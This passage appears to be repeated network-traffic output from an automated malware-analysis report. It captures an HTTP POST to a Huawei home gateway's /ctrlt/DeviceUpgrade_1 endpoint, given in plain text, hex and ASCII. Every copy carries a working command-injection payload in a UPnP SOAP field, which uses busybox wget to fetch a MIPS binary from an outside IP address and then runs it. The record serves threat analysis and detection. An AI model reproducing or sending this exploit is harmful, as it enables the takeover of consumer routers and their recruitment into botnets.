version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 